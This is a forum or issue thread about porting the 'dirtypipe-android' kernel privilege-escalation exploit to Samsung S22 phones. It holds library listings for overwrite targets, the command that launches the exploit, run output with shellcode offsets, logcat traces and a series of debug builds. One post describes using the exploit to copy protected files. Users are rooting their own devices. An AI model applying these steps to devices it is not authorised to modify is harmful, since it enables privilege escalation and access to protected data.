vendor/lib/libqdutils.so
vendor/lib/libqfp_sensortest.so
vendor/lib/libqisl.so
vendor/lib/libqll.so
vendor/lib/libqll10.so
vendor/lib/libqllengine.so
vendor/lib/libqmi.so
vendor/lib/libqmi_cci.so
vendor/lib/libqmi_client_helper.so
vendor/lib/libqmi_client_qmux.so
vendor/lib/libqmi_common_so.so
vendor/lib/libqmi_csi.so
vendor/lib/libqmi_csvt_srvc.so
vendor/lib/libqmi_encdec.so
vendor/lib/libqmi_legacy.so
vendor/lib/libqmiservices.so
vendor/lib/libqmiservices_ext.so
vendor/lib/libqrtr.so
vendor/lib/libqrtrclient.so
vendor/lib/libqseed3.so
vendor/lib/libqservice.so
vendor/lib/libqshcamera.so
vendor/lib/libqsocket.so
vendor/lib/libqti-iopd-client.so
vendor/lib/libqti-iopd.so
vendor/lib/libqti-perfd-client.so
vendor/lib/libqti-perfd.so
vendor/lib/libqti-util.so
vendor/lib/libqti-utils.so
vendor/lib/libqti_vndfwk_detect.so
vendor/lib/libqti_vndfwk_detect_vendor.so
vendor/lib/libqtigefar.so
vendor/lib/librapidscorer.so
vendor/lib/librcmask.so
vendor/lib/librechdr10plus.sec.so
vendor/lib/librechdr10plus.so
vendor/lib/librecordalive.so
vendor/lib/librmengine.uniplugin@1.0.so
vendor/lib/librmnetctl.so
vendor/lib/librpmb.so
vendor/lib/libsaped.so
vendor/lib/libsavsac.so
vendor/lib/libsavscmn.so
vendor/lib/libsavsvc.so
vendor/lib/libscaler_hw.unifunc.so
vendor/lib/libscaler_sw.unifunc.so
vendor/lib/libscenedetector.uniplugin@1.0.so
vendor/lib/libscveCommon.so
00001000: 5f74 696d 6564 7761 6974 0070 7468 7265  _timedwait.pthre
vendor/lib/libscveCommon_stub.so
vendor/lib/libscveObjectSegmentation.so
vendor/lib/libscveObjectSegmentation_stub.so
vendor/lib/libscveObjectTracker.so
vendor/lib/libscveObjectTracker_stub.so
vendor/lib/libsdedrm.so
vendor/lib/libsdm-color.so
vendor/lib/libsdm-colormgr-algo.so
vendor/lib/libsdm-disp-vndapis.so
vendor/lib/libsdmcore.so
vendor/lib/libsdmextension.so
vendor/lib/libsdmutils.so
vendor/lib/libsdsprpc.so
vendor/lib/libsdynatm.so
vendor/lib/libsec_semRil.so
vendor/lib/libsecaudiocoreutils.so
vendor/lib/libsecaudioinfo.so
vendor/lib/libsecfr_engine.so
vendor/lib/libsecfr_model.so
vendor/lib/libsecnativefeature.so
vendor/lib/libsecril-client.so
vendor/lib/libsecure_storage.so
vendor/lib/libsecureui_svcsock.so
vendor/lib/libsegmentationeffect.uniplugin@1.0.so
vendor/lib/libsegmentationeffect_capture.uniplugin@1.0.so
vendor/lib/libsehbluetooth_audio_session.so
vendor/lib/libsemnativecarrierfeature.so
vendor/lib/libsensorlistener.so
vendor/lib/libsensorndkbridge.so
vendor/lib/libsensorslog.so
vendor/lib/libsevrc.so
vendor/lib/libsfeShiftExtrapolation.so
vendor/lib/libsfplugin_ccodec_utils.so
vendor/lib/libshmemcompat.so
vendor/lib/libshmemutil.so
vendor/lib/libshotsuggestion.so
vendor/lib/libshotsuggestion_engines.so
vendor/lib/libsi.so
vendor/lib/libsmartfocus.uniplugin@1.0.so
vendor/lib/libsmemlog.so
vendor/lib/libsn100u_fw.so
vendor/lib/libsn220u_fw.so
vendor/lib/libsnaace.so
vendor/lib/libsnamrnb.so
vendor/lib/libsnamrwb.so
vendor/lib/libsnapdragoncolor-manager.so
vendor/lib/libsnapdragoncolor-qdcm.so
vendor/lib/libsndcardparser.so
vendor/lib/libsns_device_mode_stub.so
vendor/lib/libsns_direct_channel_stub.so
vendor/lib/libsns_registry_skel.so
vendor/lib/libsnsapi.so
vendor/lib/libsnsdiaglog.so
vendor/lib/libsoc_helper.so
vendor/lib/libsoc_helper_jni.so
vendor/lib/libsocial_image_enhancement.uniplugin@1.0.so
vendor/lib/libspcom.so
vendor/lib/libspeakercalibration.so
vendor/lib/libspictrl.so
vendor/lib/libspl.so
vendor/lib/libsqcp.so
00001000: 5f73 6600 7371 6370 5f74 626c 5f76 715f  _sf.sqcp_tbl_vq_
vendor/lib/libsrib_CNNInterface.camera.samsung.so
vendor/lib/libsrib_humanaware_engine.camera.samsung.so
vendor/lib/libssc.so
vendor/lib/libssc_default_listener.so
vendor/lib/libssd.so
vendor/lib/libssengine.uniplugin@1.0.so
vendor/lib/libstagefright_amrnb_common.so
vendor/lib/libstagefright_bufferpool@2.0.1.so
vendor/lib/libstagefright_bufferqueue_helper_vendor.so
vendor/lib/libstagefright_enc_common.so
vendor/lib/libstagefright_flacdec.so
vendor/lib/libstagefright_foundation_vendor.so
vendor/lib/libstagefright_omx_vendor.so
vendor/lib/libstagefright_soft_aacdec.so
vendor/lib/libstagefright_soft_aacenc.so
vendor/lib/libstagefright_soft_amrdec.so
vendor/lib/libstagefright_soft_amrnbenc.so
vendor/lib/libstagefright_soft_amrwbenc.so
vendor/lib/libstagefright_soft_avcdec.so
vendor/lib/libstagefright_soft_avcenc.so
vendor/lib/libstagefright_soft_flacdec.so
vendor/lib/libstagefright_soft_flacenc.so
vendor/lib/libstagefright_soft_g711dec.so
vendor/lib/libstagefright_soft_gsmdec.so
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
vendor/lib/libstagefright_soft_mpeg4enc.so
vendor/lib/libstagefright_soft_opusdec.so
vendor/lib/libstagefright_soft_rawdec.so
vendor/lib/libstagefright_soft_vorbisdec.so
vendor/lib/libstagefright_soft_vpxdec.so
vendor/lib/libstagefright_soft_vpxenc.so
vendor/lib/libstagefright_softomx.so
vendor/lib/libstagefright_softomx_plugin.so
vendor/lib/libstagefrighthw.so
vendor/lib/libstork_shared.so
vendor/lib/libsubsystem_control.so
vendor/lib/libswregistrationalgo.so
vendor/lib/libsynaFpSensorTestNwd.so
vendor/lib/libsynergy_loc_api.so
vendor/lib/libsynx.so
vendor/lib/libsysmon_cdsp_skel.so
vendor/lib/libsystem_health_mon.so
vendor/lib/libtad.so
vendor/lib/libtensorflowLite.singletake.camera.samsung.so
vendor/lib/libtensorflowlite.camera.samsung.so
vendor/lib/libtensorflowlite_gpu.camera.samsung.so
vendor/lib/libtestutils.so
vendor/lib/libtfestriping.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6e75  _ubsan_handle_nu
vendor/lib/libthermalclient.so
vendor/lib/libthirdparty_zoomtranslator_imp.so
vendor/lib/libthreadutils.so
vendor/lib/libtime_genoff.so
vendor/lib/libtinycompress.so
vendor/lib/libtinyxml2_1.so
vendor/lib/libtrustedapploader.so
vendor/lib/libtswrappercommon.so
vendor/lib/libtzdrmgenprov.so
vendor/lib/libubifocus.so
vendor/lib/libucm_tlc_comm.so
vendor/lib/libucm_tlc_direct_comm.so
vendor/lib/libucm_tlc_tz_esecomm.so
vendor/lib/libuniplugin.so
vendor/lib/libvdis.uniplugin@1.0.so
vendor/lib/libvdis_core.so
vendor/lib/libvdis_interface.so
vendor/lib/libvibrator.so
vendor/lib/libvicom.so
vendor/lib/libvideobeauty.arcsoft.so
vendor/lib/libvideobeauty.uniplugin@1.0.so
vendor/lib/libvideobeauty_interface.so
vendor/lib/libvideotxr.so
vendor/lib/libvmmem.so
vendor/lib/libvndfwk_detect_jni.qti.so
vendor/lib/libvndfwk_detect_jni.qti_vendor.so
vendor/lib/libvorbisidec.so
vendor/lib/libvpphcp.so
vendor/lib/libvpphvx.so
vendor/lib/libvppimmotion.so
vendor/lib/libvpx.so
vendor/lib/libwpa_client.so
vendor/lib/libwqe.so
vendor/lib/libwsmd_functions.so
vendor/lib/libxml.so
vendor/lib/libxtadapter.so
vendor/lib/libzoomroi.samsung.so
vendor/lib/qti.video.utils.videobufferlayout.so
vendor/lib/sensors.flicker.so
vendor/lib/sensors.grip.so
vendor/lib/sensors.ssc.so
vendor/lib/shared-file-region-aidl-cpp.so
vendor/lib/unihal_cutils@2.1.so
vendor/lib/unihal_main@2.1.so
vendor/lib/unihal_uniplugin@1.0.so
00001000: 5f6c 696e 6b00 6765 745f 706c 7567 696e  _link.get_plugin
vendor/lib/uwb_uci.helios.so
vendor/lib/vendor.display.color@1.0.so
vendor/lib/vendor.display.color@1.1.so
vendor/lib/vendor.display.color@1.2.so
vendor/lib/vendor.display.color@1.3.so
vendor/lib/vendor.display.color@1.4.so
vendor/lib/vendor.display.color@1.5.so
vendor/lib/vendor.display.color@1.6.so
vendor/lib/vendor.display.color@1.7.so
vendor/lib/vendor.display.config@1.0.so
vendor/lib/vendor.display.config@1.1.so
vendor/lib/vendor.display.config@1.10.so
vendor/lib/vendor.display.config@1.11.so
vendor/lib/vendor.display.config@1.2.so
vendor/lib/vendor.display.config@1.3.so
vendor/lib/vendor.display.config@1.4.so
vendor/lib/vendor.display.config@1.5.so
vendor/lib/vendor.display.config@1.6.so
vendor/lib/vendor.display.config@1.7.so
vendor/lib/vendor.display.config@1.8.so
vendor/lib/vendor.display.config@1.9.so
vendor/lib/vendor.display.config@2.0.so
vendor/lib/vendor.display.postproc@1.0.so
vendor/lib/vendor.qti.data.factory@2.0.so
vendor/lib/vendor.qti.data.factory@2.1.so
vendor/lib/vendor.qti.data.factory@2.2.so
vendor/lib/vendor.qti.data.factory@2.3.so
vendor/lib/vendor.qti.data.factory@2.4.so
vendor/lib/vendor.qti.data.mwqem@1.0.so
vendor/lib/vendor.qti.data.slm@1.0.so
vendor/lib/vendor.qti.diaghal@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.1.so
vendor/lib/vendor.qti.gnss-V1-ndk_platform.so
vendor/lib/vendor.qti.gnss-service.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0-impl.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0-impl.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0.so
vendor/lib/vendor.qti.hardware.automotive.vehicle@1.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.1.so
vendor/lib/vendor.qti.hardware.cacert@1.0.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0.so
vendor/lib/vendor.qti.hardware.camera.device@1.0.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0.so
vendor/lib/vendor.qti.hardware.capabilityconfigstore@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.api@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.constants@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.1.so
vendor/lib/vendor.qti.hardware.data.connection@1.0.so
vendor/lib/vendor.qti.hardware.data.connection@1.1.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.0.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.1.so
vendor/lib/vendor.qti.hardware.data.flow@1.0.so
vendor/lib/vendor.qti.hardware.data.latency@1.0.so
vendor/lib/vendor.qti.hardware.data.lce@1.0.so
vendor/lib/vendor.qti.hardware.data.qmi@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@3.0.so
vendor/lib/vendor.qti.hardware.display.allocator@4.0.so
vendor/lib/vendor.qti.hardware.display.composer@1.0.so
vendor/lib/vendor.qti.hardware.display.composer@2.0.so
vendor/lib/vendor.qti.hardware.display.config-V1-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V2-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V3-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V4-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V5-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.demura@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.1.so
vendor/lib/vendor.qti.hardware.display.mapper@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@3.0.so
vendor/lib/vendor.qti.hardware.display.mapper@4.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.1.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.2.so
vendor/lib/vendor.qti.hardware.dsp@1.0.so
vendor/lib/vendor.qti.hardware.eid@1.0.so
vendor/lib/vendor.qti.hardware.fingerprint@1.0.so
vendor/lib/vendor.qti.hardware.iop@1.0.so
vendor/lib/vendor.qti.hardware.iop@2.0.so
vendor/lib/vendor.qti.hardware.mwqemadapter@1.0.so
vendor/lib/vendor.qti.hardware.pal@1.0.so
vendor/lib/vendor.qti.hardware.perf@2.0.so
vendor/lib/vendor.qti.hardware.perf@2.1.so
vendor/lib/vendor.qti.hardware.perf@2.2.so
vendor/lib/vendor.qti.hardware.perf@2.3.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.0.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.1.so
vendor/lib/vendor.qti.hardware.qccvndhal@1.0.so
vendor/lib/vendor.qti.hardware.qdutils_disp@1.0.so
vendor/lib/vendor.qti.hardware.qseecom@1.0.so
vendor/lib/vendor.qti.hardware.qteeconnector@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.1.so
vendor/lib/vendor.qti.hardware.servicetracker@1.2.so
vendor/lib/vendor.qti.hardware.slmadapter@1.0.so
vendor/lib/vendor.qti.hardware.soter@1.0.so
vendor/lib/vendor.qti.hardware.systemhelper@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.1.so
vendor/lib/vendor.qti.hardware.trustedui@1.2.so
vendor/lib/vendor.qti.hardware.tui_comm@1.0.so
vendor/lib/vendor.qti.hardware.vpp@1.1.so
vendor/lib/vendor.qti.hardware.vpp@1.2.so
vendor/lib/vendor.qti.hardware.vpp@1.3.so
vendor/lib/vendor.qti.hardware.vpp@2.0.so
vendor/lib/vendor.qti.ims.callcapability@1.0.so
vendor/lib/vendor.qti.ims.callinfo@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.1.so
vendor/lib/vendor.qti.ims.rcsconfig@2.0.so
vendor/lib/vendor.qti.ims.rcsconfig@2.1.so
vendor/lib/vendor.qti.latency@2.0.so
vendor/lib/vendor.qti.latency@2.1.so
vendor/lib/vendor.qti.memory.pasrmanager@1.0.so
vendor/lib/vendor.qti.memory.pasrmanager@1.1.so
vendor/lib/vendor.qti.power.pasrmanager@1.0.so
vendor/lib/vendor.qti.qspmhal@1.0.so
vendor/lib/vendor.qti.spu@1.0.so
vendor/lib/vendor.qti.spu@1.1.so
vendor/lib/vendor.qti.spu@2.0.so
vendor/lib/vendor.qti.voiceprint@1.0.so
vendor/lib/vendor.samsung.hardware.audio@1.0.so
vendor/lib/vendor.samsung.hardware.biometrics.face@2.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dp@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dpsink@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.audio@2.0.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0-impl.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0-legacy.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0.so
vendor/lib/vendor.samsung.hardware.health@2.0.so
vendor/lib/vendor.samsung.hardware.hqm@1.0.so
vendor/lib/vendor.samsung.hardware.hyper-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.security.hdcp.wifidisplay-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.snap@1.0.so
vendor/lib/vendor.samsung.hardware.snap@1.1.so
vendor/lib/vendor.samsung.hardware.snap@1.2.so
vendor/lib/vendor.samsung.hardware.thermal@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1-impl.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0.so
vendor/lib/vendor.samsung.hardware.uwb@1.0.so
vendor/lib/vintf-codecsolution-V2-ndk_platform.so

[elliwigy]

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

It does exist on s22 ultra (SM-S908U) which is what I posted above in /vendor/lib.. not sure why the S22 would be any different?

[polygraphene]

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite.
The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

[elliwigy]

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

[oakieville]

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

[oakieville]

seems it cant access vendor/lib/* files

[Dog10dogg]

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the smasungs.

My work around was (instead of compiling)
Opened the release file "dirtypipe-android" in HxD Changed both places that contained "/system/lib/libldacBT_enc.so" with "/////system/lib/random.so" (the first "/" and the ."so" has to line up but you can have as many beginning "/" as you need to null out extra letters in the path name)
Periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work tho as I can use it to copy normally unreadable files and copy them to sdcard.
I believe it is either knox or the module needs to be trailered to Samsung's kernel.
I would attach the log but it crashes without any log output on adb.
Also the libs between s908u and s908u1 are different. Only two of the possibilities were the same for me.
I used several vendor libs but mostly picked this one /vendor/lib/libcamxifestriping.so due to it beening the same across both models.

I can use the vendor shell to look at the modules on vendor_dklh/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant tho.

[oakieville]

/system/lib/libldacBT_enc.so isnt what it was calling if you look at the code it print "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from same varible it loads lib from, i beleave as elliwigy explained it requires being /vender/bin/sh to access those libs correctly

lib/libextmediaformatdef.so
00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472 _crop.city-id.tr

maybe this?

[Dog10dogg]

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

[elliwigy]

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course its in lib64 not lib dir..

[elliwigy]

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

so maybe edit it to use the same so file but in lib64

[polygraphene]

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.
According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

That's absolutely right. My bad.
It was unnecessary to extract firmware. Thanks!

[polygraphene]

run.bat dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s) startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s) magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so Offset found: shellcode_offset: a57d0 hook_offset: 5b260 Empty space size: 2096 bytes Run index: 0 Shell code size: 308 0x134 bytes open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

There doesn't seem to be "/system/lib/libldacBT_enc.so" as @Dog10dogg said.
Actually "libldacBT_enc.so" can be any file which is not so frequently used by system.
You can choose 64bit "/system/lib64/libldacBT_enc.so". I will add option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname(/vendor/lib/libstagefright_soft_mp3dec.so in Pixel 6) are confusing name, but have different roles.
dirtypipe-android (shell process) overwrite stage2_lib to send code to be executed in init process.
Then init process overwrite stage2_param_libname so that it have content of mymod.ko.

[polygraphene]

I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash.
I will upload debug version later.

[oakieville]

Also if change that to a lib in system lib in the command it doesnt say file not found or atleast didnt when i tried it

[polygraphene]

dirtypipe-android-1.0.3-debug1.zip

Try this version.
This version should output logcat like following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboot, there is something wrong in stage1.

Even if device doesn't reboot, please manually reboot after launch run.bat. Because it won't automatically restore file content. Reboot is required to restore original files.

[polygraphene]

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat.
It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists
When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

[polygraphene]

dirtypipe-android-1.0.3-debug3.zip
Try third version if you got "Permission denied".

It will produce following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If failed, it might reboot or doesn't output any log.

[polygraphene]

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3.
If this version still reboot the device, there is something wrong on kernel module.

[elliwigy]

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before can check the /dev exists.. It does a kernel panic.

[elliwigy]

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

Yep, kernel panic/crash on my S22 Ultra

[elliwigy]

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

I am downloading SM-S908U kernel source code now

[polygraphene]

You missed debug1. But I found the problem in your log on debug2.

first instruction has an unexpected value. It means different compiler option was used for S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

[elliwigy]

You missed debug1. But I found the problem in your log on debug2.

first instruction has an unexpected value. It means different compiler option was used for S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

Sure...

/system/lib64/libc++.so

[polygraphene]

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post output of run.bat.

